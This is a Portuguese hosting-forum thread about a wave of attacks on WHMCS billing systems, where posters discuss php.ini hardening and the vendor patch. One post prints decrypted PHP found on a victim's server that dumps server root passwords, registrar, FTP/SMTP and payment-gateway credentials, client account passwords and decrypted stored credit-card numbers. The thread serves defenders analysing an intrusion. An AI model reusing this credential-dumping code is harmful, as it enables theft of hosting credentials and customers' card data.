Ir para conteúdo
View in the app

A better way to browse. Learn more.

Portal do Host

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Tentativas de invasão em meu WHMCS

Featured Replies

Postado
Se estao usando o fopen pra gravar o arquivo pra upar a shell... não é simples desabilitar o fopen no php.ini?

Isso faz parte daquela configuração básica que o CSF recomenda.

Postado
Isso faz parte daquela configuração básica que o CSF recomenda.

Pois é...

aqui eu abri uma conta em um vps que tenho pra teste e instalei o whmcs

tentei de td forma criar o arquivo, pelos codigos q postaram aqui....

nao funfou....

acho que a treita está em desabilitar as funcoes no php.ini, que permitem acesso ao whmcs...

Postado

Pessoal me ajude... também aconteceu o mesmo comigo e não é a primeira vez...

Descriptografei o código e olhe o resultado:

include('configuration.php'); $query = mysql_query("SELECT * FROM tblservers"); $text=$text."\r\n######################### HOST ROOTS ###########################\r\n"; while($v = mysql_fetch_array($query)) { $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; $password = decrypt ($v['password'], $cc_encryption_hash); $text=$text."Type $type\r\n"; $text=$text."Active $active\r\n"; $text=$text."Hostname $hostname\r\n"; $text=$text."Ip $ipaddress\r\n"; $text=$text."Username $username\r\n"; $text=$text."Password $password\r\n**************************************\r\n"; } $text=$text."\r\n######################### HOST ROOTS ###########################\r\n"; $text=$text."\r\n######################### Domain Reseller ###########################\r\n"; $query = mysql_query("SELECT * FROM tblregistrars"); while($v = mysql_fetch_array($query)) { $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt ($v['value'], $cc_encryption_hash); if ($value=="") { $value=0; } $password = decrypt ($v['password'], $cc_encryption_hash); $text=$text."$registrar $setting $value\r\n"; } $text=$text."\r\n######################### Domain Reseller ###########################\r\n"; $text=$text."\r\n######################### FTP +SMTP ###########################\r\n"; $query = mysql_query("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or setting='FTPBackupPassword' or setting='FTPBackupDestination' or setting='SMTPHost' or setting='SMTPUsername' or setting='SMTPPassword' or setting='SMTPPort'"); while($v = mysql_fetch_array($query)) { $value =$v['value']; if ($value=="") { $value=0; } $text=$text.$v['setting']." ".$value."\r\n" ; } $text=$text."\r\n######################### FTP +SMTP ###########################\r\n"; $text=$text."\r\n######################### Payment gateway ###########################\r\n"; $query = mysql_query("SELECT * FROM tblpaymentgateways"); while($v = mysql_fetch_array($query)) { $gateway = $v['gateway']; $setting = $v['setting']; $value = $v['value']; $text=$text."$gateway|$setting|$value\r\n"; } $text=$text."\r\n######################### Payment gateway ###########################\r\n"; $text=$text."\r\n######################### Client R00ts ###########################\r\n"; $query = mysql_query("SELECT * FROM tblhosting where (username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or username = 'administrator') and domainstatus='Active'"); while($v = mysql_fetch_array($query)) { $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n"; } $text=$text."\r\n######################### Client R00ts ###########################\r\n"; $text=$text."\r\n######################### Client HOST ###########################\r\n"; $query = mysql_query("SELECT * FROM tblhosting where domainstatus='Active'"); while($v = mysql_fetch_array($query)) { if (($v['username'] ) and ($v['password'])) { $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n"; } } $text=$text."\r\n######################### Client HOST ###########################\r\n"; $text=$text."\r\n######################### Client CC ###########################\r\n"; $query = mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> '' order by issuenumber desc"); while($v = mysql_fetch_array($query)) { $cchash = md5( $cc_encryption_hash.$v['0']); $s= mysql_query("select cardtype,AES_DECRYPT(cardnum,'{$cchash}') as cardnum,AES_DECRYPT(expdate,'{$cchash}') as expdate,AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,AES_DECRYPT(startdate,'{$cchash}') as startdate,country,email,firstname,lastname,address1,city,state,postcode,phonenumber FROM `tblclients` where id='".$v['0']."'" ); $country = $v['country']; $email = $v['email']; $firstname = $v['firstname']; $lastname = $v['lastname']; $address1 = $v['address1']; $city = $v['city']; $state = $v['state']; $postcode = $v['postcode']; $phonenumber = $v['phonenumber']; $v2=mysql_fetch_array($s); $text=$text."\r\n".$v2[0]."|".$v2[1]."|".$v2[2]."|".$v2[3]."|".$v2[4]." $firstname $lastname ~ $address1:$city:$state:$postcode:$phonenumber $country $email\r\n"; } $text=$text."\r\n######################### Client CC ###########################\r\n"; echo($text);

O que pode ter acontecido?

PS.: Estou usando a última versão

Postado

@rangelalvess Sua nova versão está com atualizada com o novo patch ?

Postado

Não me aguentei, vejam isso:

Agora pouco, entra um Argentino em meu site, e vai direto para a Central do Cliente criar um ticket, adivinhem o que eu tenha suposto que seria?

Vejam as capturas de tela

print1g.jpg

print2kx.jpg

print3t.jpg

Como vocês podem ver, ele estava utilizando proxy, e pesquisou no bing.com por br/clientarea.php

Graças ao script "salvador" do Edvan, este ataque foi bloqueado.

Mas aí vem uma pergunta, POR QUE o BRASIL?

Postado

Essa semana também sofri um, só que o IP era de Morocco

Postado

Essa semana também sofri um, só que o IP era de Morocco

Pois é, só que no meu caso, o melhante procurou WHMCS brasileiro

Postado

Mas aí vem uma pergunta, POR QUE o BRASIL?

Quando esta onda de ataques começou, eu procurei informações sobre a falha e o método utilizado pelos invasores. Um dos conteúdos que eu encontrei foi um fórum onde estavam compartilhando o programinha utilizado nos ataques.

Lá o cara que disponibilizou o programa havia avisado que a maioria das empresas grandes (que utilizam o WHMCS) já haviam aplicado o patch de segurança (disponibilizado pelo Matt). Então ele indicou que os ataques fossem feitos em empresas/domínios menos importantes. Inclusive sugerindo .br

Talvez seja por isso que nós tivemos muitos ataques aqui no Brasil. -_-

Mas quem aplicou o patch já está seguro.

Estas tentativas de agora são só de "retardatários" à procura de empresas que ainda não tenham aplicado o patch (que nessa altura do campeonato espero que sejam pouquíssimas, ou nenhuma). ;)

Postado

Quando esta onda de ataques começou, eu procurei informações sobre a falha e o método utilizado pelos invasores. Um dos conteúdos que eu encontrei foi um fórum onde estavam compartilhando o programinha utilizado nos ataques.

Lá o cara que disponibilizou o programa havia avisado que a maioria das empresas grandes (que utilizam o WHMCS) já haviam aplicado o patch de segurança (disponibilizado pelo Matt). Então ele indicou que os ataques fossem feitos em empresas/domínios menos importantes. Inclusive sugerindo .br

Talvez seja por isso que nós tivemos muitos ataques aqui no Brasil. -_-

Mas quem aplicou o patch já está seguro.

Estas tentativas de agora são só de "retardatários" à procura de empresas que ainda não tenham aplicado o patch (que nessa altura do campeonato espero que sejam pouquíssimas, ou nenhuma). ;)

Mas para quem está instalando o WHMCS agora, ele já ve com este patch certo?

Postado

Mas para quem está instalando o WHMCS agora, ele já ve com este patch certo?

Sim, as novas instalações já tem o patch incluso.

Visitante
Este tópico está impedido de receber novos posts.

Quem Está Navegando 0

• Nenhum usuário registrado visualizando esta página.

Informação Importante

Concorda com os nossos termos?

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.